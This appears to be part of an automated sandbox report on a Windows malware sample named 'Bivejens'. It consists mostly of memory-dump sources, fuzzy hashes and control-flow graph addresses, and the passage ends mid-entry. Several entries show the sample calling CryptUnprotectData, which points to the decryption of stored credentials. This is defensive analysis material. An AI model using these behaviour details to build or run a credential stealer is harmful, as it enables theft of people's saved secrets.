                                                                                                                          • Instruction Fuzzy Hash: 70829330A44209CFCB15CFA8C984AAEBBF2BF88311F558655E815DF261D734ED89CB52

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1452 21099548-21099577 1453 21099579 1452->1453 1454 2109957e-21099614 1452->1454 1453->1454 1456 210996b3-210996b9 1454->1456 1457 21099619-2109962c 1456->1457 1458 210996bf-210996d7 1456->1458 1459 2109962e 1457->1459 1460 21099633-21099684 1457->1460 1461 210996d9-210996e6 1458->1461 1462 210996eb-210996fe 1458->1462 1459->1460 1478 21099697-210996a9 1460->1478 1479 21099686-21099694 1460->1479 1465 21099a81-21099b7e 1461->1465 1463 21099700 1462->1463 1464 21099705-21099721 1462->1464 1463->1464 1467 21099728-2109974c 1464->1467 1468 21099723 1464->1468 1470 21099b80-21099b85 1465->1470 1471 21099b86-21099b90 1465->1471 1475 2109974e 1467->1475 1476 21099753-21099785 1467->1476 1468->1467 1470->1471 1475->1476 1484 2109978c-210997ce 1476->1484 1485 21099787 1476->1485 1481 210996ab 1478->1481 1482 210996b0 1478->1482 1479->1458 1481->1482 1482->1456 1487 210997d0 1484->1487 1488 210997d5-210997de 1484->1488 1485->1484 1487->1488 1489 21099a06-21099a0c 1488->1489 1490 210997e3-21099808 1489->1490 1491 21099a12-21099a25 1489->1491 1492 2109980a 1490->1492 1493 2109980f-21099846 1490->1493 1494 21099a2c-21099a47 1491->1494 1495 21099a27 1491->1495 1492->1493 1503 21099848 1493->1503 1504 2109984d-2109987f 1493->1504 1496 21099a49 1494->1496 1497 21099a4e-21099a62 1494->1497 1495->1494 1496->1497 1500 21099a69-21099a7f LdrInitializeThunk 1497->1500 1501 21099a64 1497->1501 1500->1465 1501->1500 1503->1504 1506 21099881-210998a6 1504->1506 1507 210998e3-210998f6 1504->1507 1508 210998a8 1506->1508 1509 210998ad-210998db 1506->1509 1510 210998f8 1507->1510 1511 210998fd-21099922 1507->1511 1508->1509 1509->1507 1510->1511 1514 21099931-21099969 1511->1514 1515 21099924-21099925 1511->1515 1516 2109996b 1514->1516 1517 21099970-210999d1 call 21099328 1514->1517 1515->1491 1516->1517 1523 210999d8-210999fc 1517->1523 1524 210999d3 1517->1524 1526 210999fe 1523->1526 1527 21099a03 1523->1527 1524->1523 1526->1527 1527->1489
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617313145.0000000021090000.00000040.00000800.00020000.00000000.sdmp, Offset: 21090000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21090000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 30ed685944a529aa8b835e050427faba1336177c1df60ff9b9df5aab249526ab
                                                                                                                          • Instruction ID: 082d9d0c383e44e4a904040c2fb4c7777696f69ef2b80d776efe343f707e85eb
                                                                                                                          • Opcode Fuzzy Hash: 30ed685944a529aa8b835e050427faba1336177c1df60ff9b9df5aab249526ab
                                                                                                                          • Instruction Fuzzy Hash: D3F1E474E00218CFDB14DFA9D884B9DFBB2BF88304F5481AAE848AB355DB759985CF50

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1578 219187a8-21918f6a CryptUnprotectData 1580 21918f73-21918f9b 1578->1580 1581 21918f6c-21918f72 1578->1581 1581->1580
                                                                                                                          APIs
                                                                                                                          • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 21918F5D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617614147.0000000021910000.00000040.00000800.00020000.00000000.sdmp, Offset: 21910000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21910000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CryptDataUnprotect
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 834300711-0
                                                                                                                          • Opcode ID: 1ed035bb379bd7d6bbe830b0cb12e76c2667621ef471dcc3a13233baea59f147
                                                                                                                          • Instruction ID: 343d3e783838a4e17f166e9b5081a4e1e949b59b3bd36017c74d080fdb90931b
                                                                                                                          • Opcode Fuzzy Hash: 1ed035bb379bd7d6bbe830b0cb12e76c2667621ef471dcc3a13233baea59f147
                                                                                                                          • Instruction Fuzzy Hash: 4911297680035DDFDB10DF9AC445BDEBBF5EB48320F148429EA58A7210C375A990DFA5

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1584 21918ef1-21918f6a CryptUnprotectData 1585 21918f73-21918f9b 1584->1585 1586 21918f6c-21918f72 1584->1586 1586->1585
                                                                                                                          APIs
                                                                                                                          • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 21918F5D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617614147.0000000021910000.00000040.00000800.00020000.00000000.sdmp, Offset: 21910000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21910000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CryptDataUnprotect
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 834300711-0
                                                                                                                          • Opcode ID: eeecebf0c54561088d8e0a380838008077f5676214560984e3f0bbc87705722e
                                                                                                                          • Instruction ID: 2c35268134723887e8c827a3d31bfa2061be2d8f744ca52224b514fa69053779
                                                                                                                          • Opcode Fuzzy Hash: eeecebf0c54561088d8e0a380838008077f5676214560984e3f0bbc87705722e
                                                                                                                          • Instruction Fuzzy Hash: E11156B68003499FDB10CF99C841BEEBFF5EF48320F148459EA58A7210C379A990DFA5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617780565.00000000219A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_219a0000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6801101af98d7087e18600c4fb3af0c89f1a70424ec5e0b2ea43dfaac646f033
                                                                                                                          • Instruction ID: c15d815800460fec1b823b6d1d54ef18b3f94cf7ffed54a8bde84cfab5dc99f1
                                                                                                                          • Opcode Fuzzy Hash: 6801101af98d7087e18600c4fb3af0c89f1a70424ec5e0b2ea43dfaac646f033
                                                                                                                          • Instruction Fuzzy Hash: 3E825A74E012288FDB64DF69CD94B9DBBB2BB89300F1081EAD85DA7261DB315E85CF41
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617313145.0000000021090000.00000040.00000800.00020000.00000000.sdmp, Offset: 21090000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21090000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b0a42f72982d3c65b30ff101f77c297bbbf2a1292dd5dd91a9455867d8afeefb
                                                                                                                          • Instruction ID: 4f94af30552ded56e7bbba61dcf17f81ce7204e90ab31b4ae2d5b1743b360a7d
                                                                                                                          • Opcode Fuzzy Hash: b0a42f72982d3c65b30ff101f77c297bbbf2a1292dd5dd91a9455867d8afeefb
                                                                                                                          • Instruction Fuzzy Hash: AF72BD74E01228CFDB65DF69C890BDDBBB6BB89310F1481EAD448A7255DB349E81CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 071dfc0c93d28fc9a23f50b6bfd2239d446d5110969610a1a6a95e33a189bf4b
                                                                                                                          • Instruction ID: 3a26405df433c58aff6a4e5c7a06cc87f7d7e4adb90e05d63a69c035268f7959
                                                                                                                          • Opcode Fuzzy Hash: 071dfc0c93d28fc9a23f50b6bfd2239d446d5110969610a1a6a95e33a189bf4b
                                                                                                                          • Instruction Fuzzy Hash: F0328E6690D7D08FCB638B7448A825B7FB06B93105BC945DFC4D78B687DB28C609C362
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617780565.00000000219A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_219a0000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7a355684f01ef1c0b90e0da5a957f378fa2615c7dd11d3e8f84b134239425e75
                                                                                                                          • Instruction ID: 5bd398fcd7f191207a760c85a259cd2f3559f02602f6836ca9463a55cbf0fd97
                                                                                                                          • Opcode Fuzzy Hash: 7a355684f01ef1c0b90e0da5a957f378fa2615c7dd11d3e8f84b134239425e75
                                                                                                                          • Instruction Fuzzy Hash: C9726B74E012288FEB64DF69CD94BDDBBB2BB89300F1081E9985DA7261DB315E85CF41
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 943f199d08fbc812852eb1cf44078a2d22519402df5892ad34571bc5cf5168d7
                                                                                                                          • Instruction ID: 20dd5cfa8da6899e30b0f4e5962f426792df87c0aa0875f21b99785d0e708f01
                                                                                                                          • Opcode Fuzzy Hash: 943f199d08fbc812852eb1cf44078a2d22519402df5892ad34571bc5cf5168d7
                                                                                                                          • Instruction Fuzzy Hash: DF128F70B00219CFDB14DFA5C854BAEBBB6BF88301F608559E859EB391DB349D45CB90
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 71fd1b909a4664eb7ef9c6c2cb6b6da648ff3e049cf38966821c4855b07774e9
                                                                                                                          • Instruction ID: 528dc0a55b471ab1c08a96f8bff9abe4c7891021807bf8b3f22b19b6cd35f93c
                                                                                                                          • Opcode Fuzzy Hash: 71fd1b909a4664eb7ef9c6c2cb6b6da648ff3e049cf38966821c4855b07774e9
                                                                                                                          • Instruction Fuzzy Hash: 6B025F30A04219DFCB15CF68E885AADBBF2BF49311F158069EC25AB2A1D730DD45CF51
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1b6aea95eff5765e34fcb67e1e1ea5d8046f26dae33c0283cb77779189db5f7e
                                                                                                                          • Instruction ID: 020427da9c6f007fa28d16618a4f582d2748a90b8e228c067b4416b9d3d82c4d
                                                                                                                          • Opcode Fuzzy Hash: 1b6aea95eff5765e34fcb67e1e1ea5d8046f26dae33c0283cb77779189db5f7e
                                                                                                                          • Instruction Fuzzy Hash: 3CE1C074E01218CFEB24DFA5C990B9DBBB2BF89304F1080AAD419BB355DB755A85CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617614147.0000000021910000.00000040.00000800.00020000.00000000.sdmp, Offset: 21910000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21910000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: ab0aa590986f852ba64963ffa7a00c43ccccd30c844cb25ebec17114d1ef612f
                                                                                                                          • Instruction ID: b96f9764ffa0cc2a2e5b2fb50b93ed9f1d28015ae6352a39f68fb67eb74c3740
                                                                                                                          • Opcode Fuzzy Hash: ab0aa590986f852ba64963ffa7a00c43ccccd30c844cb25ebec17114d1ef612f
                                                                                                                          • Instruction Fuzzy Hash: CEE1C274E01218CFEB24DFA5C994B9DBBB2BF89304F2081AAD409A7395DB355E85CF10
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b2b2a372b6debe562c353326d45695561d7adc727f2529f65ea1db97dbbc006c
                                                                                                                          • Instruction ID: d52af2b987ffae64e1757451bf5cbb11b4d4acc9d00ff017132a79db3426e653
                                                                                                                          • Opcode Fuzzy Hash: b2b2a372b6debe562c353326d45695561d7adc727f2529f65ea1db97dbbc006c
                                                                                                                          • Instruction Fuzzy Hash: 2FD18274E01228CFEB54DFA5C994B9DBBB2BF89300F5081A9D809AB355DB359E81CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b22f752f610d4eb475c9458e4c6aaac4c429591b73d0f4cad8933d06669d9962
                                                                                                                          • Instruction ID: e91cce9bc73dfd79eb33a163bbb25cdad6d1b38e9c2792674ff9765cf11f667a
                                                                                                                          • Opcode Fuzzy Hash: b22f752f610d4eb475c9458e4c6aaac4c429591b73d0f4cad8933d06669d9962
                                                                                                                          • Instruction Fuzzy Hash: A9D19174E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617815047.00000000219B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_219b0000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4644f5e8921ecdc55ac9ccb9c3e52db90ff56870b52fbdefe351561023c1e2de
                                                                                                                          • Instruction ID: 1d2c75ac3726c6d5609a86474aabfa0a49c625db556b16c022b2b22164b347ae
                                                                                                                          • Opcode Fuzzy Hash: 4644f5e8921ecdc55ac9ccb9c3e52db90ff56870b52fbdefe351561023c1e2de
                                                                                                                          • Instruction Fuzzy Hash: 2CD19174E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617614147.0000000021910000.00000040.00000800.00020000.00000000.sdmp, Offset: 21910000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21910000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9a277f1253d9644cf1a4925591dfdef8172777a9d72fb2b78638f300e51eb4b5
                                                                                                                          • Instruction ID: dcf5e9113ce1c4c8e31d0965b580e60a26c6eee014f13f49430849a426ff7efb
                                                                                                                          • Opcode Fuzzy Hash: 9a277f1253d9644cf1a4925591dfdef8172777a9d72fb2b78638f300e51eb4b5
                                                                                                                          • Instruction Fuzzy Hash: FDD1B074E00218CFEB55DFA5C990B9DBBB2BF89300F5080A9D849AB355DB719E81CF10
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617313145.0000000021090000.00000040.00000800.00020000.00000000.sdmp, Offset: 21090000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21090000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 56e74741a0557cd8b98e8f704295ac565f84bd653f5526760178145a1ecbc169
                                                                                                                          • Instruction ID: 7e5aca39a0403fdaf4dac157e0031d4257306cee5e732b93dfb92fc83c233c56
                                                                                                                          • Opcode Fuzzy Hash: 56e74741a0557cd8b98e8f704295ac565f84bd653f5526760178145a1ecbc169
                                                                                                                          • Instruction Fuzzy Hash: 0FC19074E01218CFDB14DFA5C994B9DBBB2BF89300F1081AAD809AB365DB359E85DF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617313145.0000000021090000.00000040.00000800.00020000.00000000.sdmp, Offset: 21090000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21090000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a5586eda1bfc3f80c92079fa64e90d17ca14d226e0b183a9cff9579fd3e40e61
                                                                                                                          • Instruction ID: 9b655160e72fb9ccba4ddd79407d506b63edd1581cc88ea7a56db90b17dd40e5
                                                                                                                          • Opcode Fuzzy Hash: a5586eda1bfc3f80c92079fa64e90d17ca14d226e0b183a9cff9579fd3e40e61
                                                                                                                          • Instruction Fuzzy Hash: 1CC1BF74E01218CFDB14DFA5C994B9DBBB2BF89300F6080AAD809AB355DB359E85DF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617614147.0000000021910000.00000040.00000800.00020000.00000000.sdmp, Offset: 21910000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21910000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: ef07d672a978e93517a1d6a35809649834c35356945c1810eab6acd37315a269
                                                                                                                          • Instruction ID: e9706004859bfce3e772e58ccf6e8f14e1a033cc797f38a1d0cba12a46cd6af7
                                                                                                                          • Opcode Fuzzy Hash: ef07d672a978e93517a1d6a35809649834c35356945c1810eab6acd37315a269
                                                                                                                          • Instruction Fuzzy Hash: 53C1B174E00218CFDB14DFA5C994B9DBBB2BF89300F6480AAD809AB355DB359E85CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617941470.0000000021B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 21B30000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21b30000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4004887ba42809fc17076cc65394b8126a78ffec8fce2b1204b3b83ae839ae7b
                                                                                                                          • Instruction ID: 163068a459ce4eea37442d25769d98fdb676c32c62ae80ce17a39d4d606e9b2e
                                                                                                                          • Opcode Fuzzy Hash: 4004887ba42809fc17076cc65394b8126a78ffec8fce2b1204b3b83ae839ae7b
                                                                                                                          • Instruction Fuzzy Hash: E8914A71954618CFEB14EFA0C8997EEBBB1FB4A316F101429D1017B2E0CB794A48CF95
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617313145.0000000021090000.00000040.00000800.00020000.00000000.sdmp, Offset: 21090000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21090000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c2ebb5ea1d8f1ec69cb39d7ba7e355b5ef5ffd8e4fcbdb2dd2e36c4c6ad98312
                                                                                                                          • Instruction ID: e150c14f5e6fdfabe5324ad1ada3a973362a4cc94fd29d7ac1e6af8a648db33c
                                                                                                                          • Opcode Fuzzy Hash: c2ebb5ea1d8f1ec69cb39d7ba7e355b5ef5ffd8e4fcbdb2dd2e36c4c6ad98312
                                                                                                                          • Instruction Fuzzy Hash: ACA11470D00208CFEB10DFA5C994BDEBBB1FF89314F208269E509AB2A1DB759984CF55
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617313145.0000000021090000.00000040.00000800.00020000.00000000.sdmp, Offset: 21090000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21090000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: cbd7abf6b07afb9b444ede7bc3cf6957f84f3ce171319e9f8b99425be280df12
                                                                                                                          • Instruction ID: 9278c9ec53f82066849315a9eb9eecebbe8917306dbd0b049b8d5e06878d337f
                                                                                                                          • Opcode Fuzzy Hash: cbd7abf6b07afb9b444ede7bc3cf6957f84f3ce171319e9f8b99425be280df12
                                                                                                                          • Instruction Fuzzy Hash: 6AA10470D00208CFEB10DFA9C994BDDBBB1FF89314F208269E509AB2A1DB759985CF55
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617313145.0000000021090000.00000040.00000800.00020000.00000000.sdmp, Offset: 21090000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21090000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: efff716be614c742714756eef71c0507fd4b66fdd1a783e0fa0da82d7fb493b1
                                                                                                                          • Instruction ID: 2d7cfc47b30bf3465c4f181f77054d38affd57b2ae2bb78182784237f14acbfa
                                                                                                                          • Opcode Fuzzy Hash: efff716be614c742714756eef71c0507fd4b66fdd1a783e0fa0da82d7fb493b1
                                                                                                                          • Instruction Fuzzy Hash: BB91D470D00618CFEB10DFA4C894BDDBBB1FF49314F2092A9E509AB2A1DB759985CF15
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617780565.00000000219A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_219a0000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 667fcfa1e3e56e54071fdb8f3f59caba65bb5ff6a492db9e7cc9bc27c15fc84c
                                                                                                                          • Instruction ID: b43795529fcaed0df64d6b3ef4f4c4b46a2afeac13202507499ba999f8b6db18
                                                                                                                          • Opcode Fuzzy Hash: 667fcfa1e3e56e54071fdb8f3f59caba65bb5ff6a492db9e7cc9bc27c15fc84c
                                                                                                                          • Instruction Fuzzy Hash: E681C374E00218CFEB14DFA5C991B9DBBB2FF89300F608169D809AB354DB769986DF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617815047.00000000219B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_219b0000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 80b7d7655b78c4ad0473f72d2c67f760cf4949edf8082aa12603ff8423371682
                                                                                                                          • Instruction ID: 9e6efea662b65ff0f27d3faa9da2b47e78677ca991008d2d613ef09de90c8e7f
                                                                                                                          • Opcode Fuzzy Hash: 80b7d7655b78c4ad0473f72d2c67f760cf4949edf8082aa12603ff8423371682
                                                                                                                          • Instruction Fuzzy Hash: 5781B174E00218CFEB14DFA5C990BADBBB2FF89300F608169D819AB354DB359986DF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617815047.00000000219B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_219b0000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f6204a75b85c92cf75055ab33e5fe666cc174f447815f96fffa55a52b2a47e8d
                                                                                                                          • Instruction ID: b62ee9ee111956f219d7d4e60e916e205830ed6ee9cad27fef0781faf2d7b68f
                                                                                                                          • Opcode Fuzzy Hash: f6204a75b85c92cf75055ab33e5fe666cc174f447815f96fffa55a52b2a47e8d
                                                                                                                          • Instruction Fuzzy Hash: AB81C274E00218CFEB14DFA5C990BADBBB2FF89304F608169D809AB354DB359996DF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9e447eaafc79bb453f06680a26c2197413fd4b97a03ee302e793dd743d22724d
                                                                                                                          • Instruction ID: 555d90e9399e14537bd77de0dc3c8de7f2fc5f72d22548d86bb2655c7d6a61d0
                                                                                                                          • Opcode Fuzzy Hash: 9e447eaafc79bb453f06680a26c2197413fd4b97a03ee302e793dd743d22724d
                                                                                                                          • Instruction Fuzzy Hash: DA81B474E00218CFDB54DFAAD884A9DBBF2BF89301F14C06AE819AB365DB745945CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 02a09867699606c5fcb06b23bc7ba512640c46a3869e0a7285b470f8111d7858
                                                                                                                          • Instruction ID: 873bacafcdd391abe9ae99274e553fe63afc6128b510ae69c13c4e08ae9c12d7
                                                                                                                          • Opcode Fuzzy Hash: 02a09867699606c5fcb06b23bc7ba512640c46a3869e0a7285b470f8111d7858
                                                                                                                          • Instruction Fuzzy Hash: 6A81B474E00218CFDB54DFAAD884A9DBBF2BF89301F24C069E859AB361DB745945CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b192ead97c08f48a5a60873a80e681d10cf963f4e4a476ddfda10be37ad4840e
                                                                                                                          • Instruction ID: 9643eeb76de3544c533a1b7108a2b50e29fa9d36862283f8f2c6b769c5a81263
                                                                                                                          • Opcode Fuzzy Hash: b192ead97c08f48a5a60873a80e681d10cf963f4e4a476ddfda10be37ad4840e
                                                                                                                          • Instruction Fuzzy Hash: F481B374E00218CFEB14DFAAD884A9DBBF2BF89311F14C169E819AB365DB349945CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: ddaf8087d9a1430f6736cf34bc3d47d8371fd22c759f3ad592715e488df12279
